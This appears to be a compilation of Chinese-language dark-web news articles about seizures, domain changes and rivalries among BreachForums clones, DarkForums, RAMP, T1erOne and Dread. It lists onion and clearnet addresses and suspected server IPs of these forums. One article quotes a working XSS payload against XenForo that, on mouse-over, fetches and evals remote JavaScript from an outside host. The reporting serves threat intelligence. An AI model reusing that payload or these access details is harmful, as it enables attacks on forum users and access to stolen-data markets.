暗网论坛

RaidForums、BreachForums都是曾经臭名昭著的暗网数据泄露论坛，提供被盗数据发布与交易的平台。近些年，在美国联邦调查局、国际刑警组织、欧洲刑警组织等国际执法机构的努力下，几个暗网数据泄露论坛被打击了多次。 目前仍然还存在且在暗网与明网可以同时访问的暗网数据泄露论坛还剩：两个版本的BreachForums（Indra的BreachForums与Hasan的BreachForums）、BreachForums的最大竞争对手DarkForums，这些论坛除了面临竞争对手的挑战，还得面对在执法机构的查封压力。 近期，执法机构采取密集行动，查封了三个暗网数据泄露论坛的多个域名。随后这些论坛迅速响应，启用了新的明网域名。“暗网下/AWX”整理了这几个论坛的明网域名更迭记录。 Indra的BreachForums的明网域名更迭 2025年12月，在多个版本的BreachForums被执法机构摧毁后，Indra推出了新的BreachForums论坛，明网域名为breachforums[.]bf。 2026年2月4日，breachforums[.]bf域名遭受据称HasanBroker等的社会工程学攻击，被暂停解析，暂停期间，Indra的BreachForums迅速启用了新的明网域名breachforums[.]jp。后Indra设法找回了bf域名，并恢复使用了bf域名，随即jp域名被放弃使用。 2026年2月，安全研究人员多次研究出breachforums[.]bf的真实IP，分别为：95.129.233.76、185.129.102.34、31.172.87.150。 2026年2月14日，breachforums[.]bf域名再次被暂停解析，这次疑似是真被执法机构查封，并同时查封了breachforums[.]jp域名。 同日，Indra的BreachForums又一次迅速启用了新明网域名breachforums[.]as，并发布公告称，此次纯属注册商单方面暂停服务，与BreachForums内部运营无关，系统安全状态完好无损。未发生任何安全事件，未出现数据泄露，其基础设施、服务器及数据均未受影响。 Hasan的BreachForums的明网域名更迭 2026年1月，原BreachForums的管理员HasanBroker推出了另一个新的BreachForums，明网域名为breachforums[.]cz。2026年2月12日，有安全研究人员分析出该域名的子域名mail[.]breachforums[.]cz背后的真实IP为176.123.2.86。 2026年2月20日，breachforums[.]cz域名被执法机构查封，虽然依然能打开，但是访问时提示“Page could not be loaded”。在breachforums[.]cz域名被查封后，Hasan的BreachForums启用新明网域名breachforums[.]in为其主域名。 DarkForums的明网域名更迭 2025年，暗网出现一个新的数据泄露论坛DarkForums，成为BreachForums有力的竞争对手。DarkForums使用明网域名darkforums[.]st。 安全研究人员分析出了darkforums[.]st背后的IP：185.178.208.177，185.11.145.145, 185.11.145.254，185.196.9.155，85.208.156.120。 2025年12月，DarkForums启用新的明网域名darkforums[.]io，2026年1月，有安全研究者称该域名背后对应的真实IP有185.208.158.89、185.178.208.154。2026年2月4日，darkforums[.]io域名被执法机构查封，无法访问。 2026年2月4日，darkforums[.]io域名被查封后，DarkForums启用明网域名darkforums[.]me为主域名，该域名是DarkForums之前就持有的备用域名。当时DarkForums的所有者Knox发布带有PGP签名的论坛公告宣布“Official Domains – Old Mirrors Disabled”： —–BEGIN PGP SIGNED MESSAGE—– Hash: SHA256 All previous domains and mirror links have been permanently disabled by the providers and are no longer active. Please update your bookmarks. The only official addresses going forward are: Clearnet: https://darkforums.me Onion (Tor): http://darkfoxaqhfpxkrbt7vxns2z2u2k72sgmqbzeorupaiottw3ecm2wgyd.onion We will announce and list any new mirrors here as they are added.

“暗网下/AWX”前期报道，臭名昭著的俄罗斯暗网论坛RAMP已经被FBI查封，RAMP曾是允许讨论勒索软件的暗网论坛，受到勒索软件团伙的欢迎。最新情报显示，RAMP的替代品已经出现，新暗网论坛的名称为“T1erOne”（也被称为TierOne、t1eron3、Tier1），可以同时通过暗网和明网进行访问。 近日，有安全研究人员club1337（@club31337）发布推文表示“Ramp已死，TierOne万岁”，并给出了新的T1erOne网站的暗网与明网域名。“暗网下/AWX”对该推文进行了核验，确认T1erOne网站的暗网与明网域名均可以访问： T1erOne的暗网域名：jprrin6bqe3flvtpyxkt4zsmzc3u6vvn7ahgtcbul224w3xn4h3gawid[.]onion T1erOne的明网域名：t1eron3[.]vip Ramp is dead. Long live TierOne.https://t.co/akRDXrnJvahttps://t.co/dm8re9gWcU pic.twitter.com/pEh2aUb78M — club1337 (@club31337) February 12, 2026 “暗网下/AWX”尝试访问T1erOne论坛，发现该网站主要提供了登录和注册功能。打开该网站，显示了一个简洁的登录界面，包括用户名、密码输入框，以及注册链接，没有复杂的交互或可见的外部资源加载。可以明确的是，与常规暗网论坛不同，新的T1erOne论坛并非使用常见的开源PHP论坛程序如phpBB、MyBB或SMF等进行搭建，可能系背后的管理员独立开发。 初步分析，T1erOne论坛采用了前后端分离的网站架构，还使用了Socket.IO技术来实现实时双向通信。其明网页面使用了Cloudflare的CDN服务，这可能为执法部门找到其背后的真实服务器IP提供便利。 T1erOne论坛注册不需要邮箱验证，但注册该网站以后，需要管理员进行认证，访问所有页面均跳转提示： Этот форум только по закрытому входу. Чтобы попасть, надо скинуть свои другие форумные акк (Рехаб, хсс, эксплойт) или заплатить 450$ на БТЦ / XMR кошелёк. Message an admin | Напиши админу （本论坛为私密论坛。如需访问，您必须发送您的其他论坛账号（Rehab、XSS、Exploit）或向BTC/XMR钱包支付450美元。联系管理员 | 给管理员写信。） 本站（anwangxia.com）经过对页面的解析，发现了其后端的部分API接口如下： /api/auth/register /api/auth/login /api/public/banners/image/2 /api/auth/me /api/public/settings /api/notifications /api/messages/unread-count 安全研究人员认为T1erOne与此前RAMP的活动关联，并正在通过新的T1erOne论坛监控该组织，这表明网络犯罪分子的攻击行为不回停歇，勒索软件的侵扰仍将继续。T1erOne论坛接下来将如何发展以及会不会步RAMP后尘，“暗网下/AWX”将持续关注。 更多暗网新闻动态，请关注“暗网下/AWX”。

一提暗网，好多人脑子里还是老一套：黑市、贩毒、雇佣杀手啥的，电影看多了。但对我们这些做威胁情报的来说，它更像一个乱哄哄的地下集市，各种角色混在一起，信息流动快得惊人。到了2026年，暗网的各个角落已经碎片化得不行了——没有哪个暗网论坛能一统江湖，取而代之的是好几个各有专长的社区。有些专供新手混，有些是老鸟交易重型货色的，还有些纯粹是情报交换站。想知道你的公司数据会不会哪天被挂出来卖？得先搞清楚这些地方的门道。 一、Dread：地下世界的“风向标” Dread还是那个Dread，暗网里最像Reddit的存在。2026年了，它依旧是很多人每天必上的地方——不卖东西，主要就是聊。 这里什么话题都有：新漏出来的数据库谁有？哪个勒索团伙又在吹牛？某个工具是真神器还是骗钱的？诈骗犯被同行曝光的帖子也能刷屏。氛围有点像微博热搜，但全是黑灰产的版本。 为什么重要？很多大事件在主流媒体报道前，好几个月就在Dread上发酵了。勒索软件新变种、团伙内讧、甚至哪个管理员跑路了，这里往往是最先冒泡的地方。防御端来说，这里是抓“早期信号”最好的窗口——噪声多是多，但信号确实真。 二、BreachForums：数据泄露的“头条制造机” BreachForums这几年命真硬，克隆版本如雨后春笋般顽强，且爆发激烈战争。2026年初刚被爆出一次大规模用户数据库泄露，几十万账号暴露，社区一度乱套，但它还是顽强活了下来（或者说，不断有人接续重启了）。这地方就是数据泄露的“菜市场”——零售巨头、游戏公司、社交平台的dump，常常是这里最先挂出来。 热闹是真热闹，记者也爱盯着这里写报道。但别被表象骗了：一半帖子是假货、重复利用老数据，或者纯粹为了炒热度。真正有价值的情报，得会分辨上下文和卖家信誉。 对企业来说，这里是监控自家品牌泄露的首选站点的之一。很多公司在内部检测到异常前，好几天就在这里看到自家员工凭证被甩卖了。 三、XSS（以及它的“继承者们”）：初始接入的“华尔街” XSS.is在2025年中被各国警方搞了一次大的国际联合执法行动，管理员被抓，域名也被查封。但俄罗斯语社区的生命力你懂的——2026年，类似的功能已经部分转移到RAMP、DamageLib这些继任者身上。老XSS的风格没变：重度商业化，卖的就是企业网络的“门票”——RDP、VPN、域管账号、云主机权限。 这里交易的不是小打小闹的个人账号，而是能直接横向移动的大企业访问权。很多后续的勒索攻击，第一步就是在这些地方买到的初始接入。 防御方得特别留意：等你内部告警响了，往往已经晚了三步。盯着这些初始接入经纪人（IAB）的动向，才能提前堵枪眼。 四、Exploit.in与CryptBB：技术硬核的“实验室” Exploit.in还在，定位没变：工具、漏洞、恶意软件的深度讨论区。这里不像前面几个那么喧闹，更像是技术宅的私人俱乐部。私有exploit、零日交易、新型恶意软件源码分享，都在这里悄悄进行。 2026年新冒头的CryptBB走得更极端——加密做得极严，准入门槛高，主要服务精英玩家。想看到下一代攻击技术在扩散前的模样？这俩地方是必看窗口。 普通公司可能觉得离自己远，但其实不然：很多“高级”技术过几个月就会流到低端市场，变成脚本小子都能用的货。 五、Nulled、Cracked、Altenen、LeakBase：大众化的“灰色集散地” 这几个论坛用户量大得吓人，门槛低，内容五花八门——从破解账号、盗刷教程，到现成的恶意软件工具包，应有尽有。Nulled和Cracked偏工具和破解，Altenen更重carding和欺诈，LeakBase则是纯数据泄露分享。 别看它们“低端”，影响力其实很大。新手从这里入门，老鸟也常来淘便宜货。很多主流恶意软件家族的变种，就是先从这些地方扩散开来的。 为什么防御端不能忽略？因为攻击大众化的趋势越来越明显——威胁不再只来自顶尖APT，很多普通企业的噩梦就是这些社区里随便一个脚本小子用现成工具捅进来的。 总结：最后说两句 2026年的暗网论坛生态，比以往任何时候都更分散、更韧性，“暗网下/AWX”认为，执法机构应该紧盯这些论坛，以随时掌握暗网新的动态。 旧的被端了，新的马上冒头；热闹的社区里噪音多，但真正的情报价值也高。做威胁情报的都知道：光靠技术挡是挡不住的，得懂对手在哪儿聊天、聊什么、谁在卖什么。盯紧这些地方，不是为了看热闹，而是为了在他们动手前，先知道他们想干嘛。

自从多次重启后的BreachForums论坛被FBI查封之后，暗网先后出现了两个名为BreachForums的论坛，一个是Indra的BreachForums[.]bf（管理员Indra与N/A），一个是Hasan的BreachForums[.]cz（管理员HasanBroker与breach3d）。这两个论坛的诞生注定会硝烟四起，BreachForums克隆论坛之间的一场战役正在打响。 “暗网下/AWX”此前跟踪报道，Indra的BreachForums[.]bf于2025年12月诞生，使用MyBB搭建，通过投放.fr域名数据库并伪造政府邮箱宣布论坛成立，宣称自己才是真正的官方BF论坛；Hasan的BreachForums[.]cz于2026年1月出现，使用XenForo搭建，称自己才是正统，目前已吸引逾1400名成员加入。 近期，这两个BreachForums论坛的战争进入了白日化阶段，先是BreachForums[.]bf域名被社会工程学攻击后被暂停，其次BreachForums[.]cz论坛也遭受了短时间的跨站脚本（XSS）漏洞攻击，整体而言，Hasan的BreachForums[.]cz略占上风。 BreachForums[.]bf域名丢失后又被找回 2月3日，BreachForums[.]bf域名突然被域名注册商暂停访问，其管理员N/A发布公告，紧急启动BreachForums[.]jp域名来替代访问。同时，Hasan在BreachForums[.]cz发布主题“Takedown of the Fake Clone”（拿下仿冒克隆），并表示正在使用SQL注入、跨站脚本、SSRF请求等诸多漏洞进行攻击。 2月8日，访问BreachForums[.]bf，显示异常的篡改消息以及倒计时，暗示该平台可能遭遇安全事件或系统入侵。界面显示了以下内容：公开倒计时、泄露的个人图像、提及涉嫌犯罪活动及执法部门的签名声明、与论坛常规运营通知无关的声明。 根据暗网研究专家IntelOps（@IntelOpsV3）发布的消息，有黑客窃取某西非国家政府邮箱后，通过社会工程手段诱使域名注册商暂停了BF域名。域名注册商将技术援助请求转交布基纳法索的ABDI机构作为主管当局寻求协助，但技术援助集体成功推动其采取行动。 据称，Hasan在该域名被删除后成功注册该域名，并在2月8日发布了篡改页面。但Indra最终说服注册商该举报属虚假信息，重新夺回BreachForums[.]bf域名控制权，并发布公告恢复该域名的使用。 BreachForums[.]cz网站被篡改后快速恢复 2月5日，BreachForums[.]cz网站曾遭遇了一次跨站脚本（XSS）漏洞攻击，短暂遭到篡改，疑似因为XenForo存在跨站脚本漏洞。Hasan发帖解释，该XSS漏洞可利用性源于XenForo解析BBcode的机制，属于原生漏洞即零日漏洞。 该Payload利用JavaScript的eval函数实现Base64编码的解码功能（部分依赖混淆性安全机制）。通过atob函数解码后，得到以下在鼠标悬停时触发的JavaScript有效载荷： (async() => { var u = "https://breachforums.pathetic.wtf/server.php?get=payload"; var r = await fetch(u); var t = await r.text(); eval(t); })() Payload如下： 'c': ['https://breachforums.pathetic.wtf/server.php', "[table width=\"100%' onmouseover='eval(atob(&quot;KGFzeW5jKCk9PnsgICAgIHZhciB1ID0gImh0dHBzOi8vYnJlYWNoZm9ydW1zLnBhdGhldGljLnd0Zi9zZXJ2ZXIucGhwP2dldD1wYXlsb2FkIjsgICAgIHZhciByID0gYXdhaXQgZmV0Y2godSk7ICAgICB2YXIgdCA9IGF3YWl0IHIudGV4dCgpOyAgICAgZXZhbCh0KTsgfSkoKQ==&quot;))'\"] [tr][td]click here and you will be entered into the giveaway[/td][/tr] [/table]", 0x1, "credits giveawayy", 0x0, 0x1964, 'setTimeout', 0x2, "\n<head>\n <meta charset=\"utf-8\">\n <title>owned</title>\n <style>\n body { margin: 0; padding: 0; height: 100vh; background: #000; color: #ff00aa; font-family: 'Courier New', Courier, monospace; display: flex; align-items: center; justify-content: center; text-align: center; overflow: hidden; }\n .

在美国联邦调查局（FBI）的努力下，臭名昭著的俄罗斯暗网论坛RAMP的暗网和明网网站已被美国执法部门查封。RAMP，即“俄罗斯匿名市场”（Russian Anonymous Marketplace）的缩写，是一个以俄语为主的在线交易平台，自称是“唯一允许勒索软件存在的地方”，深受勒索软件即服务团伙、敲诈勒索者、初始访问经纪人和其他从事网络犯罪的不法分子青睐的 在其他一些论坛（例如XSS）被查封后，RAMP已成为少数几个仍能逍遥法外的网络犯罪论坛之一。XSS的领导人去年被欧洲刑警组织逮捕。这一真空使得RAMP成为传播勒索软件和其他网络威胁的人员买卖或交易产品和服务的主要场所之一。 美国联邦调查局 (FBI) 与佛罗里达州南区联邦检察官办公室和司法部计算机犯罪与知识产权部门协调，执行了此次查封行动。目前访问RAMP的暗网Tor域名（rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd[.]onion）及其明网域名（ramp4u[.]io），两个域名显示内容完全相同，为一个醒目的页面，页面显示执法部门的横幅广告，上面写着：“本网站已被查封”，意味着FBI已接管RAMP的域名。 扣押横幅上写着，FBI与美国佛罗里达州南区检察官办公室和美国司法部（DoJ）计算机犯罪和知识产权科（CCIPS）合作查封了该网站。该通知还嘲讽了RAMP运营商，上面写着“勒索软件唯一允许的地方！”，并配上了一张俄罗斯卡通人物玛莎（俄罗斯热门儿童动画片《玛莎和熊》中眨眼的玛莎）眨眼的图片。这份扣押横幅上没有像其他类似行动那样印有任何其他国际执法机构的标志，只列出了FBI和司法部的印章，似乎强调本次查封是美国当局独立完成的。 经“暗网下/AWX”测试，RAMP明网网站的域名服务器（DNS）记录已经重定向到FBI经常用于打击非法活动的域名服务器： Name Server: ns1.fbi.seized.gov Name Server: ns2.fbi.seized.gov 由于RAMP的暗网域名也被查封，本站（anwangxia.com）认为，FBI应已获取了RAMP论坛用户数据库和其他敏感的网站信息，如电子邮件地址、IP地址、私人消息和其他可能构成犯罪证据的信息，也就意味着经常访问与使用该网站的用户可能会被执法部门追踪到。 目前尚无任何关于RAMP运营者或用户被捕或拘留的消息。查封通知邀请公众通过FBI的IC3门户网站提交线索。 RAMP的查封行动与此前针对其他网络犯罪论坛的类似行动相呼应，表明执法部门正持续努力打击犯罪基础设施。虽然官方尚未确认任何逮捕行动，但此次行动凸显了勒索软件即服务（RaaS）运营及其相关生态系统面临的日益严峻的压力。 RAMP宣称是唯一允许勒索软件传播的暗网论坛 RAMP于2012年创建，最初是一个运行在Tor网络上的暗网网站，但直到2021年才开始声名鹊起，其运营者与现已解散的Babuk勒索软件团伙有关联。RAMP论坛目前的形态是在XSS和Exploit（俄罗斯网络犯罪领域两大主要暗网论坛）以及英语论坛BreachForums禁止讨论勒索软件之后形成的。 RAMP（俄罗斯匿名市场）宣称是暗网上唯一能允许勒索软件的论坛，该平台服务于俄语、中文和英语用户，拥有超过14000名注册用户，尤其受到勒索软件组织及其附属机构的青睐。所有用户在注册前都经过严格审核，或支付500美元匿名参与。该论坛提供讨论组、网络攻击教程以及恶意软件和服务市场。其首席管理员表示，该网站在2024年的年收入为25万美元。 RAMP最初旨在连接勒索软件运营者、关联方和中间商，如今已发展成为勒索软件生态系统的核心枢纽，成为威胁行为者协作、招募和交易的场所。目前RAMP不仅仅是一个交流平台，它更是一个勒索软件市场，DragonForce、Qilin、Medusa、GLOBAL Group、Eldorado和LockBit等勒索软件团伙都在此活跃。这些团伙积极招募技术娴熟的成员，宣传新的勒索软件变种，并共享行动情报，所有这些都是为了扩大自身的影响力和能力。 RAMP论坛的管理员中有一位名叫米哈伊尔·马特维耶夫（Mikhail Matveev）的俄罗斯公民，他也使用过Orange、Wazawaka和BorisElcin等化名，他于2022年表示，已经该论坛的所有权将转移给一位名叫“Stallman”的黑客。马特维耶夫于2024年在俄罗斯被捕。 2023年，马特维耶夫因参与多起勒索软件攻击活动（包括Babuk、LockBit和Hive）而被美国司法部起诉，这些攻击的目标是美国医疗保健机构、执法机构和其他关键基础设施。他还受到美国财政部外国资产控制办公室的制裁，并被列入联邦调查局的通缉名单，美国国务院悬赏高达1000万美元，征集能够逮捕或定罪他的信息。 网名为“Stallman”的黑客在RAMP论坛被关闭时仍然是该论坛的管理员，网络安全情报显示，Stallman“在维护信任、执行规则和管理平台的技术运营方面发挥了核心作用”。 在被查封后，情报公司Red Sense的联合创始人Yelisey Bohuslavskiy在LinkedIn上发帖解释说，RAMP是由与俄罗斯安全部门关系密切的人员创建的，目的是为了应对勒索软件即服务（RaaS）的蔓延。 他表示，直到2020年，俄罗斯、白俄罗斯和乌克兰的执法部门对Ryuk、Conti、REvil、Maze、Ragnar、Netwalker等传统且组织严密的网络犯罪集团都有很强的可见性。 “这种可见性部分来自于安全相关管理员对漏洞利用和跨站脚本攻击的控制。随后，RaaS（风险即服务）呈爆炸式增长。这种模式失控地蔓延：甚至论坛管理员也对关联方完全没有控制权。而RAMP正是为了解决这个问题而开发的，”他补充道。 据专家称，RAMP是新兴的、中低层级的勒索软件组织宣传自身、提供服务并“尽可能提高知名度”的主要中心。 Flare的高级威胁情报研究员Tammy Harper将RAMP描述为“网络犯罪生态系统中最值得信赖的勒索软件相关论坛之一”。 她解释说，该平台“被广泛认为是一个高度可信的托管环境”，并且是勒索软件运营商、中间人和关联方的主要讨论中心。 CybaVerse的安全运营中心 (SOC) 经理Ben Clarke解释说，RAMP成功的原因是“它为犯罪分子提供了一个支持整个攻击链的市场，从购买被盗凭证、推广恶意软件到出售和购买勒索软件服务。” 据了解，包括LockBit、ALPHV/BlackCat、Conti、DragonForce、Qilin、Nova、Radiant和RansomHub在内的许多臭名昭著的勒索软件组织都曾在不同时期在这个论坛上活动过。 Stallman承认FBI已经控制RAMP论坛，暂无重建计划 THE RAMP ADMINISTRATOR CONFIRMED THE ATTACK. A user with the nickname Stallman on the forum XSS confirmed that the forum administration had lost control. Here is the text of the statement: To whom it may concern.

自从后缀为bf的新BreachForums出现后，原BreachForums的管理员HasanBroker一直表示该BreachForums（breachforums[.]bf）系冒牌货，并称自己将努力恢复真正的BreachForums，并重塑辉煌。终于在1月17日，HasanBroker在其Telegram频道宣布了另一个新BreachForums的诞生，开放邀请大家注册。 “暗网下/AWX”看到，HasanBroker创建的BreachForums是基于论坛程序XenForo搭建的，而传统的BreachForums都是使用论坛程序MyBB，或许是由于MyBB可能存在一些不确定漏洞的缘故。 HasanBroker的新版本BreachForums明网与暗网地址如下： 明网地址：breachforums[.]cz 暗网地址：http://breach5yz2b5lepmq4gaqwcon3jippw3bislhvvdavem5git55sy2nid[.]onion 在宣布该新BreachForums（breachforums[.]cz）成立的公告中，HasanBroker宣称，BreachForums已经不复存在，支离破碎，影响力日渐式微。如今剩下的只有噪音、诱饵陷阱和那些试图取代昔日辉煌的平台。该新论坛旨在重建一个专注于信息、技术讨论和社区驱动的交流空间，摒弃一切浮夸作秀、虚假承诺和虚伪伪装。 HasanBroker称，他无意改写历史，也并非觊觎从未正式传承的头衔。这无关所有权，而是关乎方向。他们将回归这些论坛的初心：赚钱、恶搞、突袭、数据泄露、数据交易，以及最重要的——享受乐趣。 HasanBroker表示，注册受到严格限制。所有申请均需人工审核，审核标准包括： 展现出的操作意识 行为规范且具备常识 HasanBroker提醒道，不使用Gmail等邮箱就能很好地证明这一点，并举例说cock.li是一个不错的隐私选择。 HasanBroker承诺新BreachForums保持匿名，并致力于最大限度地减少不必要的曝光。他们已采取措施规避不记录IP地址的问题，并从论坛软件中彻底移除了该功能。目前，他们仅通过服务器日志记录IP地址，以防止DDoS攻击，但无法追踪到目标用户，且日志每天都会被删除。 HasanBroker要求使用VPN或Tor浏览器访问他的新BreachForums 最后，HasanBroker宣布： 如果您想恶意捣乱、攻击或制造全球性事件——这里正是您理想的去处。 如果您正在寻找一个重视谨慎、贡献和持续性的社区——欢迎您。 愿上帝保佑我们的论坛，消灭它的敌人。 BreachForums万岁！ 此外，HasanBroker在Telegram频道表示，虽然随着所有重要工作的完成，新BreachForums论坛已搭建完成正式上线，但还会有更多的更新，如SMTP服务器还需要时间完善，注册采用手动审核机制，不过这部分问题不算太严重。太阳已在BreachForums论坛升起，照亮了那些骗子。 HasanBroker称在Telegram和其他平台上的活跃度将相对减少，专门使用BreachForums进行数据交易等，除非情况发生变化。接下来几天将添加Shoutbox和Escrow功能。HasanBroker提醒，无论多么有吸引力，切勿让任何平台剥夺您的操作安全权利。始终使用VPN或Tor，如果担心后门，可以两者都用。 近2天的Telegram频道公告发布了该论坛的更新，将Tor图标移至Clearnet主界面（此前图标显示位置错误，即使用户退出Tor网络，图标仍会保留），升级后相关问题已得到解决。另外，HasanBroker宣布了接下来将要开发的功能或者将要进行的活动： 完整的托管系统 向我们的成员颁发奖励 可能的赠品活动 ShinyHunters和其他团体发布的高质量数据 广告系统 喊话箱 对于“广告系统”，HasanBroker解释道，每个横幅将是一个N/A模板，直到有人决定为其支付1000积分，这些积分可以通过活跃度获得或支付35欧元。一旦你这样做，它将进入审批队列，并可以由工作人员接受——如果被拒绝，你将获得积分返还，并且可以再次申请。常见问题将显示你需要避免的审批事项。 对于“托管系统”，HasanBroker解释道，每个人都知道托管是如何运作的，它是任何论坛的重要结构，尤其是像BreachForums这样的论坛——你提交你的数据，买家提交资金，当双方都批准时，交易发生，否则，资金将自动从任一方退回。 对于“喊话箱”，HasanBroker解释道，虽然有点晚，但他们正在重新设计在MyBB软件上使用的原始喊话箱，但由于新BreachForums使用的是XenForo，设计上有些不同，它将很快发布，比之前的系统快得多。 经测试，截止发稿，从零开始的新BreachForums论坛的注册用户已经250多人，帖子数目60多篇，活跃度渐增，发展势头很明显。HasanBroker的新BreachForums（breachforums[.]cz）是否能够超越或者替代Indra的新BreachForums（breachforums[.]bf），FBI等执法部门对此后起之秀是否有新的执法行动，“暗网下/AWX”将持续关注。 更多暗网新闻动态，请关注“暗网下/AWX”。

几天前，“暗网下/AWX”报道了新的暗网论坛BreachForums再次出现，且无法确定其背后是什么人在运营，当时据称“由于持续的技术问题和大规模DDoS攻击”，该论坛仅可访问，但无法登录。目前，该论坛已经可以在明网正常登录发贴，但暗网地址依旧无法访问。 此外，威胁行为者之间的战争仍在持续。闪光猎手组织在shinyhunte[.]rs网站上发布了更多人肉线索与内幕，为警方打击提供了更多的便利。 新BreachForums再次恢复了访问 正如前期介绍，新的BreachForums使用之前公开泄露的BreachForums备份进行搭建，因此前期的BreachForums用户均无需注册即可访问。 在技术问题和大规模DDoS攻击问题解决之后，新的BreachForums再次开放访问，该论坛目前添加了DDOS-GUARD来防护DDoS攻击，在明网访问的速度还不错。 虽然许多传言显示新BreachForums是蜜罐，但由于缺少有力的竞争对手，该论坛依旧收获了大量粉丝。从论坛的在线状态看，一小时在线用户1000人，注册用户占1/5，在没有大规模推广的背景下，已经收获了相当大的人气。 上次已经介绍，新的BreachForums发布的明网与暗网地址如下（仅供网络安全研究人员与警方调查研究使用）： 明网地址：breachforums[.]bf 暗网地址：http://breachedmw4otc2lhx7nqe4wyxfhpvy32ooz26opvqkmmrbg73c7ooad[.]onion 威胁行为者之间的内讧刚刚开始 上次已经介绍，在新BreachForums背后，至少有两波人在交战：一方自称是闪光猎人（ShinyHunters），另一方则是散落的拉普斯猎人（Scattered Lapsus$ Hunters，简称SLSH）。 黑客团伙ShinyHunters与勒索软件团伙Scattered LAPSUS$ Hunters（简称SLSH）的内部冲突正在升级，一方宣称可以向联邦调查局、BL2C、国际刑警组织免费提供另一方的犯罪线索。根据对shinyhunte[.]rs网站更新内容的整理，时间线如下： 2025年10月16日：网站发布消息，直接威胁名为“James”的法国人（疑似代号S.E./X*K）。消息声称真正的ShinyHunters正在完成FBI未竟的事业，语气敌对，这是威胁行为者之间首次公开升级。 2025年10月21日：发布一封信件风格的消息，针对“James”，警告他选择的道路带来的后果比想象中更严重，断绝后路绝非明智之举。引用拉丁语短语“sic transit gloria mundi”（世间荣华转瞬即逝），并警告每一步行动都将引发远超预期的连锁反应。 2025年12月14日：否认与#SLSH（Scattered LAPSUS$ Hunters）联盟的传闻。同时链接BreachForums重启（可能试图为疑似蜜罐操作正名）。威胁如果James不回应，将在24小时内公开曝光其信息。 2025年12月18日：发布详细的PGP签名声明，附带倒计时器和逮捕照片（涉及Yuro，即A.E.，以及Trihash，即R.L.）。指控法国人“James”通过滥用信任窃取Trihash的PGP密钥，并未经其他成员同意便实施了针对Salesforce的攻击行动。声明称，归咎于ShinyHunters与SLSH的勒索事件，主要由S.E.（别名X*K，亦使用化名“James”）策划实施，他已不再是ShinyHunters（SH）成员。 —–BEGIN PGP SIGNED MESSAGE—– Hash: SHA256 Statement Regarding the Shiny Hunters and Scattered Spider Groups The Shiny Hunters group includes several members, one of whom goes by the name “James.” Following the arrests of Yuro (A.E.) and, more recently, Trihash (R.L.), this individual has been attempting to divert investigators’ attention by leading them toward false trails.

网络犯罪分子、执法人员和研究人员都熟知的臭名昭著的BreachForums论坛最近又再次回归，在暗网与明网可以同时访问。 一些之前在论坛注册的用户最近收到了邮件，声称BreachForums已经重新开放并恢复了所有功能。邮件中断言内部技术问题已经解决，所有账户、帖子和内容现在都可以正常访问。 而与上次使用泰国、赞比亚等多国警方的被盗gov邮箱发送推广邮件相似，这次的发件人的电子邮件地址是：[email protected]。interieur.gouv.fr域名属于法国内政部。也就是说，从法国政府官方域名发送的电子邮件告诉黑客，BreachForums 已恢复上线，并邀请他们注册发帖。 于是所有人都怀疑这是一次来自执法机构的网络钓鱼攻击——更准确地说，是一个引诱网络犯罪分子的蜜罐，使用之前公开泄露的BreachForums备份搭建的。 Hey @Interieur_Gouv, thanks for the "exciting" BreachForums reopening alert straight from your official email—super convincing, guys! 😏 But real talk: any chance you could prioritize finding my stolen laptop instead of running this obvious honeypot op on us security… pic.twitter.com/BSgCOzHrbC — Aleksandr Litreev (@alexlitreev) December 14, 2025 研究人员纷纷表示，暗网市场的所谓“复活”首先应持怀疑态度，这个伪装成BreachForums重启的网站是利用法国内政部域名发送通知邮件的诱饵陷阱，用户的访问记录及帖文内容极可能被用作执法证据。 然而，新成立的BreachForums论坛的运营者Indra声称，新BreachForums并非蜜罐，他们只是使用入侵获取的法国内政部邮箱发送推广邮件。 Indra宣称对此次针对法国内政部的网络攻击负责，他在声明中吹嘘，他们已获取了两个数据库的信息：TAJ（司法记录处理系统）和PFR（通缉犯档案）以及电子邮件。据报道，此次数据泄露事件影响了约1600万人。 截至目前，Indra称其仍可访问法国内政部的CHEOPS门户系统。研究人员认为黑客看起来正在使用法国内政部的Roundcube邮件系统发送电子邮件。 新BreachForums论坛管理员Indra的声明 管理员Indra于12 月13日在Breachforums发布一篇新的公告声明，对“蜜罐”事件及其他相关报道造成的误解深表歉意，对社区关注的事情进行了解释，并直接指责法国当局，提到了去年夏天在法国发生的逮捕事件。 管理员Indra在帖子中称，BreachForums”最初是“ShinyHunters/hollow”以及他们之前的另一个组织的项目。他们的整个组织（hollow、shiny等等）都被逮捕了。只有一个人拥有最初的“ShinyHunters PGP”密钥，而这个人是其朋友，但是他们之间产生了矛盾。因此，“诱饵”、“蜜罐”信息是假的，只是想关闭BreachForums，所以其就照做了。 Indra表示，在关闭网站并于15天内所有域名被查封后，相信大家都认为他们是FBI探员之类的。但显然们不是，他们会向BreachForums社区证明这一点。Indra宣布，为了报复被捕的朋友，他们已成功攻陷“MININT”——法国内政部。 Indra称，正如法国新闻报道的那样，法国内政部只承认政府私人电子邮件服务器被非法访问。但他们们绝口不提从警方档案中获取的16,444,373名个人的数据？ Indra问道，你们知道“TAJ”（Traitement d’Antécédents Judiciaires——犯罪记录处理系统）吗？ “FPR”（Fichier des Personnes Recherchées——通缉犯数据库）呢？还有更多。国际刑警组织呢？你们是不是试图向他们隐瞒我们入侵“EASF MI”系统的事实？此外，你们为什么不向法国人民和全世界说明那两周究竟发生了什么？公共财政部门（ DGFIP）呢？为什么只字未提？养老金部门（ CNAV）呢？

Dread是全球最大的暗网论坛，于2018年2月上线，拥有成千上万名活跃用户。最近该暗网论坛遇到了两件糟心的事情，一是服务器故障导致论坛服务无法正常访问，二是其管理员在Reddit论坛发布一条带有PGP签名的宕机通知后，账号被Reddit封禁。 Dread论坛的管理员HugBunter在最大的明网论坛Reddit拥有一个账号hugbunt3r，用于发布Dread论坛相关通知事项，如离线、宕机、被DDoS攻击等状态。根据Sam Bent的报道，Reddit论坛近期封禁了HugBunter在Reddit的整个账号“hugbunt3r”，HugBunter将无法再在Reddit论坛发布有关Dread的任何信息。 [November 19th] Dread server outage -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 [November 19th, 2025] Hi! We have been down for many hours now, the servers are up and running, however I am experiencing an issue causing the main VM to crash. This means that, currently, the web server is not running and you won't be able to pass the captcha to access Dread. I am working on this issue and will be trying to avoid sleeping until it is back up and running.

